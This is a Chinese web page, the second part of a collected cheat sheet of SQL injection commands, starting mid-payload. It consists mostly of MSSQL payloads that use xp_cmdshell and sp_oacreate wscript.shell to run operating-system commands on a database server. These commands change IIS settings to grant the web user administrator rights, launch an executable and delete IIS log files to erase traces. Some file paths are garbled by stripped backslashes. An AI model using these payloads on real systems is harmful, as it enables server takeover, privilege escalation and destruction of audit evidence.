设为首页 加入收藏

TOP

最全的SQL注入命令及方法-网络收集(二)
2014-11-24 01:41:56 来源: 作者: 【 】 浏览:7
Tags:最全 SQL 注入 命令 方法 网络 收集
stem32idq.dll" "C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll" "C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll" "C:winntsystem32inetsrvasp.dll">c: emp.txt,0,true
EXEC sp_oacreate scripting.filesystemobject,@fso output
EXEC sp_oamethod @fso,opentextfile,@file out,c: emp.txt
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,Readline,@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,AtEndOfStream,@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
以下是一行里面将WEB用户加到管理员组中:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate wscript.shell,@shell output EXEC sp_oamethod @shell,run,null,cmd.exe /c cscript C:InetpubAdminScriptsadsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll" "C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll" "C:winntsystem32inetsrvasp.dll">c: emp.txt,0,true EXEC sp_oacreate scripting.filesystemobject,@fso output EXEC sp_oamethod @fso,opentextfile,@file out,c: emp.txt WHILE @shell>0 BEGIN EXEC sp_oamethod @file,Readline,@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,AtEndOfStream,@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
以下是一行中执行EXE程序:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate wscript.shell,@shell output EXEC sp_oamethod @shell,run,null,cmd.exe /c cscript.exe E:jeea.net.cnscoreftsimagesiis.vbs lh1 c:>c: emp.txt,0,true EXEC sp_oacreate scripting.filesystemobject,@fso output EXEC sp_oamethod @fso,opentextfile,@file out,c: emp.txt WHILE @shell>0 BEGIN EXEC sp_oamethod @file,Readline,@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,AtEndOfStream,@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
SQL下三种执行CMD命令的方法:
先删除7.18号日志:
(1)exec master.dbo.xp_cmdshell del C:winntsystem32logfilesW3SVC5ex050718.log >c: emp.txt
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate wscript.shell,@shell output EXEC sp_oamethod @shell,run,null,cmd.exe /c del C:winntsystem32logfilesW3SVC5ex050718.log >c: emp.txt,0,true EXEC sp_oacreate scripting.filesystemobject,@fso output EXEC sp_oamethod @fso,opentextfile,@file out,c: emp.txt WHILE @shell>0 BEGIN EXEC sp_oamethod @file,Readline,@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,AtEndOfStream,@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
首页 上一页 1 2 下一页 尾页 2/2/2
】【打印繁体】【投稿】【收藏】 【推荐】【举报】【评论】 【关闭】 【返回顶部
分享到: 
上一篇sqlite3 交叉编译 undefined refe.. 下一篇T-SQL检查列校验语句

评论

帐  号: 密码: (新用户注册)
验 证 码:
表  情:
内  容: